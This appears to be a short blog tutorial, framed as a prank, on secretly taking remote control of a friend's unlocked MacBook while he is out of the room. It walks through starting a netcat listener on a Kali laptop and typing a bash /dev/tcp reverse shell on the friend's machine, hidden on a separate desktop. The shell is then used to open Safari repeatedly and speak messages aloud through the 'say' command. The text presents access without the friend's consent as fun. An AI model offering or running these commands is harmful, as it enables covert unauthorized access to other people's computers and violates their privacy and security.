Real Scenarios #1: The New MacBook
You're at your friend's house. All you've heard about all day is his new laptop. He's got a brand new top-specced MacBook Pro, and he won't stop going on about it. It particularly annoys you as all you've got is a 4 year old cheap laptop, even if it is running Linux.
If only there was some way to make him stop gloating!
Your goal is to be able to remotely control his computer, then whilst he's on it get it to do something that will shut him up.
Unfortunately, OSX is a pretty secure OS, so there's not too much you can do in the way of quick exploits to run.
Whilst you're pondering this conundrum, your friend leaves the room to get a drink, and he's left his new laptop unlocked! This is your chance!
You probably have 120 seconds before he gets back, what can you do in that time to get remote control his computer?
You flip up the screen of your laptop, launch a terminal in Kali and type ifconfig.
You note your IP, 192.168.1.88, then turn to his computer.
What you want is a shell on his computer, through a TCP connection to yours, and you need to set it up in the least time possible!
Type the following to listen for a connection on port 1234 (you can use whichever you like as long as it's not being used by something else)
nc -l -p 1234
First, you create a new desktop on his mac as you don't want him to see what you've done.
Then, you open a terminal and type the following:
bash -i >& /dev/tcp/192.168.1.88/1234 0>&1
This creates a TCP connection to 192.168.1.88 (your IP), on port 1234, and sends bash through it, in effect creating a reverse shell.
You also turn his volume up, for something you have planned later....
You put down his laptop just as he re enters the room.
Now you have a shell on his system!
You've achieved your goal! You now have remote access to his computer!
Well, first let's just annoy him and puzzle him by repeatedly opening safari.
open -a safari
which gets sent through our TCP connection and opens safari on his screen.
We do this a few times and can visibly see him getting annoyed. Oh the joy :)
Now let's have some fun by getting his computer to say things; on OSX there's a say command, which speaks text out loud, so let your imagination run wild as to what you get it to say.
In this case, let's just make him believe he's got an error by typing the following:
say "Segmentation fault. Please return to vendor"
Oh, the look on his face.
You've had your fun, so you wind it up by saying the following in a Zarvox voice (because why the heck not):
say -v "Zarvox" "You are an idiot. Your friend, however, is awesome."
Hope you enjoyed :)